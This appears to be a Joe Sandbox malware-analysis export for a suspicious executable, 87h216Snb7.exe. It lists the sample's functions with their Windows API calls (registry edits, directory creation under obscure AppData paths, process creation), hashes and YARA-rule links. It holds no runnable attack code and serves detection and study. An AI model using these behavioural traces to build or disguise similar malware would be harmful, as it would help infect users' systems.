Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user~1\AppData\Local\Temp\$nsa
API String ID: 1716503409-3083371207
Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
Instruction ID: 6ac4114a0c6328616d68196ae331b9967fc339ed7b26ce04d623ba2336a1d7a6
Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
Instruction Fuzzy Hash: D4F09076B40204BBEB00CF69ED05F9FB7ACEB95750F11803AFA01F7180E6B099548768

Function 004015E6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00405EBB: CharNextW.USER32(?,?,00425710,?,00405F2F,00425710,00425710,771B3420,?,C:\Users\user~1\AppData\Local\Temp\,00405C6D,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\87h216Snb7.exe"), ref: 00405EC9
Part of subcall function 00405EBB: CharNextW.USER32(00000000), ref: 00405ECE
Part of subcall function 00405EBB: CharNextW.USER32(00000000), ref: 00405EE6

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040163F

Part of subcall function 00405A95: CreateDirectoryW.KERNEL32(0042C800,?), ref: 00405AD7

SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Amidoaldehyde,?,00000000,000000F0), ref: 00401672

Strings

C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Amidoaldehyde, xrefs: 00401665

Memory Dump Source

Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Amidoaldehyde
API String ID: 1892508949-4177089788
Opcode ID: 0975ff6eb310aa27d899ca9470ec3d9e9926d5528aa11726d624e4e1b9446680
Instruction ID: 707209c2395922376f9f001c82b8f9212c950a3f0646f554414056ec45e3a30b
Opcode Fuzzy Hash: 0975ff6eb310aa27d899ca9470ec3d9e9926d5528aa11726d624e4e1b9446680
Instruction Fuzzy Hash: DC11B231504514EBDF206FA5CD415AF36B0EF14368B25493FE942B22F1D63E4A81DA9D

Function 0040640F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,00000800,00000000,?,?,?,?,: Completed,?,00000000,00406680,80000002), ref: 00406455
RegCloseKey.ADVAPI32(?), ref: 00406460

Strings

: Completed, xrefs: 00406416

Memory Dump Source

Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd

Similarity

API ID: CloseQueryValue
String ID: : Completed
API String ID: 3356406503-2954849223
Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
Instruction ID: ab0cc6cc405738cc07c99bf25685dc2411b0540f073fb059e05756a610da7e73
Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
Instruction Fuzzy Hash: 4F015E72510209AADF218F51CC05EDB3BA8EB54354F01403AFD5992150D738D968DB94

Function 00407094 Relevance: 5.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ff22e2e2fe9ce3de78e7ddd3335664d820a6fec416f6b591a6c72a947d9530d
Instruction ID: 57bf2fd90c69a3a2134d3ca1d9604f9a54cf20ddad3feead76618616929b2f58
Opcode Fuzzy Hash: 2ff22e2e2fe9ce3de78e7ddd3335664d820a6fec416f6b591a6c72a947d9530d
Instruction Fuzzy Hash: 17A15471E04229CBDF28CFA8C8546ADBBB1FF44305F10846ED816BB281D7786A86DF45

Function 00407295 Relevance: 5.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0bdb7e84a84856003d11171116f50dfbd9bb9a779b2e7a3e4899fdc47cedc848
Instruction ID: 6b1c66eb9f97b1ade68f1d395623a9ed29f1776dbc94043a645b3c6b65beda35
Opcode Fuzzy Hash: 0bdb7e84a84856003d11171116f50dfbd9bb9a779b2e7a3e4899fdc47cedc848
Instruction Fuzzy Hash: C5912270E04228CBDF28CF98C854BADBBB1FF44305F14816AD856BB281D778A986DF45

Function 00406FAB Relevance: 5.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be7a598e94a0405de8a772e3f69c54869daecda94b4303a07673bf76e2652f1c
Instruction ID: ce41943af36f178b06a8ef9aeec7331a28cc36c4f565c07526a7a1ecbc0683f6
Opcode Fuzzy Hash: be7a598e94a0405de8a772e3f69c54869daecda94b4303a07673bf76e2652f1c
Instruction Fuzzy Hash: 8C813571E04228CFDF24CFA8C844BADBBB1FB45305F24816AD456BB281D778A986DF45

Function 00406AB0 Relevance: 5.2, APIs: 4, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32d59b201beac9d8f322f7ad5055b4a277c8e7969ed8db35c8d1fbf5724c7b18
Instruction ID: 8f4657df29e0a6c4f41eae1c6e560b42ebe12933d6c33c39fa024371cffe791d
Opcode Fuzzy Hash: 32d59b201beac9d8f322f7ad5055b4a277c8e7969ed8db35c8d1fbf5724c7b18
Instruction Fuzzy Hash: F4815771E04228DBDF24CFA8C8447ADBBB1FF44315F10816AD856BB281D7786986DF45

Function 00406EFE Relevance: 5.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ad3ccd1842de9fa96a72a1c56b2a37abd66cddd4bfb2a4aa43cc43f3deb674d
Instruction ID: 467485e0bb60f7ca81b57cb4e762169b1f98b62e9d0b722d18e83a7fcf81438f
Opcode Fuzzy Hash: 5ad3ccd1842de9fa96a72a1c56b2a37abd66cddd4bfb2a4aa43cc43f3deb674d
Instruction Fuzzy Hash: 04711375E04228CBDF24CFA8C844BADBBF1FB48305F15806AD856B7281D778A986DF45

Function 0040701C Relevance: 5.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 702cc36666a341df00ed023e166d9505421316bb70e071c2ca241f15019959e6
Instruction ID: 8594309fab6a939f8579025671b20e25c27ad2f20b93bd04310bc8f9388019e2
Opcode Fuzzy Hash: 702cc36666a341df00ed023e166d9505421316bb70e071c2ca241f15019959e6
Instruction Fuzzy Hash: A6713471E04228CBDF28CF98C844BADBBB1FF45305F14806AD816BB281D778A986DF45

Function 00406F68 Relevance: 5.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97fac772243d771687d70cd7bd51d4e603ca3fb4096038018fdbee07d45d8760
Instruction ID: 804367245b599a5d262e6525417658d62bb0317a144133a249ff79fbb491f744
Opcode Fuzzy Hash: 97fac772243d771687d70cd7bd51d4e603ca3fb4096038018fdbee07d45d8760
Instruction Fuzzy Hash: 04712571E04228CBDF28CF98C854BADBBB1FF44305F15806AD856B7281C778A986DF45

Function 004025C3 Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON

Download Yara Rule

APIs

RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025F6
RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 00402609
RegCloseKey.KERNELBASE(?,?,?,lftninger\slangetmmerens,00000000,00000011,00000002), ref: 00402622

Memory Dump Source

Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd

Similarity

API ID: Enum$CloseValue
String ID:
API String ID: 397863658-0
Opcode ID: 8d5b146921c23c5c32305bf675c8714087916087c3c12a48a2612aa1a4d71ea8
Instruction ID: c62eb347aa92c0fd77e7ee5b530510020135478b5af5e66508d185aa27a1e92b
Opcode Fuzzy Hash: 8d5b146921c23c5c32305bf675c8714087916087c3c12a48a2612aa1a4d71ea8
Instruction Fuzzy Hash: BE01BC71A04205BBEB149F94DE48AAFB668EF80308F10443EF001B21D0D7B84E41976D

Function 0040204F Relevance: 3.1, APIs: 2, Instructions: 65memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00406935: GetModuleHandleA.KERNEL32(?,00000020,?,0040362C,0000000C,?,?,?,?,?,?,?,?), ref: 00406947
Part of subcall function 00406935: GetProcAddress.KERNEL32(00000000,?), ref: 00406962

GetFileVersionInfoSizeW.KERNELBASE(0000000B,00000000,?,000000EE), ref: 00402065
GlobalAlloc.KERNEL32(00000040,00000000), ref: 00402084

Part of subcall function 00406488: wsprintfW.USER32 ref: 00406495

Memory Dump Source

Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd

Similarity

API ID: AddressAllocFileGlobalHandleInfoModuleProcSizeVersionwsprintf
String ID:
API String ID: 2520467145-0
Opcode ID: 151af76542c190628ef2acf394a4985ed8648910b70884bb67486c00b137938c
Instruction ID: 28cb58910f6a4acfd0ff51bb22372a53c51a3c4cd31b2d17a05334ea7d98b38a
Opcode Fuzzy Hash: 151af76542c190628ef2acf394a4985ed8648910b70884bb67486c00b137938c
Instruction Fuzzy Hash: 9E210871A00218AFDB10DFE9C985AEEBBB4EF08344F51402AFA05B62E0D7759E51DB64

Function 0040254F Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 00402580
RegCloseKey.KERNELBASE(?,?,?,lftninger\slangetmmerens,00000000,00000011,00000002), ref: 00402622

Memory Dump Source

Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: 77a5136ceac10c13572c025ea85aaea8472d44a7460d1c056a70da611617ceba
Instruction ID: d59507dec88f13297dcb42e268b6e0170753ff524d958fced3891ef78adf3038
Opcode Fuzzy Hash: 77a5136ceac10c13572c025ea85aaea8472d44a7460d1c056a70da611617ceba
Instruction Fuzzy Hash: 8F118C71904216EADF15DFA0CA589AEB7B4FF04348F20443FE806B62D0D3B84A45DB9D

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(0040A2D8,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 24120cd7971efbcf380a3cfcf85aef56aa5faf56da28ec4d1ccb8bb0957475b6
Instruction ID: 2b867b2a322a557ec20ecaa395e060e0be7e2a6973b32d365fcb6e947ad1390c
Opcode Fuzzy Hash: 24120cd7971efbcf380a3cfcf85aef56aa5faf56da28ec4d1ccb8bb0957475b6
Instruction Fuzzy Hash: 9E01F4327242209BE7195B389D05B6B3798E710314F10863FF855F66F1DA78CC429B4C

Function 00402459 Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON

Download Yara Rule

APIs

RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040247B
RegCloseKey.ADVAPI32(00000000), ref: 00402484

Memory Dump Source

Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd

Similarity

API ID: CloseDeleteValue
String ID:
API String ID: 2831762973-0
Opcode ID: eee6be69eae89fba413121a175eacf98509731d8aa1df2795f329d1288486e8c
Instruction ID: 8adcbc206ff712accdb54216371371453b286a19eaa2ac3ec43ed269339827cd
Opcode Fuzzy Hash: eee6be69eae89fba413121a175eacf98509731d8aa1df2795f329d1288486e8c
Instruction Fuzzy Hash: 48F09C32A04521ABDB10BBA9DB8D5EE7265AB44354F11443FF502B71C1CAFC4D02977D

Function 00405699 Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 004056A9

Part of subcall function 0040450C: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040451E

CoUninitialize.COMBASE(00000404,00000000), ref: 004056F5

Memory Dump Source

Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd

Similarity

API ID: InitializeMessageSendUninitialize
String ID:
API String ID: 2896919175-0
Opcode ID: e6b44ab65c096e2096ca35a4d59063f1915fe47593d787d59728b780318f1d57
Instruction ID: b888f1dcde8397bdf9a4ac710541df7d57aeeece4d3a8f29a6716c55d94af5f1
Opcode Fuzzy Hash: e6b44ab65c096e2096ca35a4d59063f1915fe47593d787d59728b780318f1d57
Instruction Fuzzy Hash: 0AF0B4776007409BE7115B54AE05B5B77B0EB90354F85483AEF8D726F1C7764C028B5D

Function 00405B24 Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F10,?,?,?,0042C800,?), ref: 00405B4D
CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405B5A
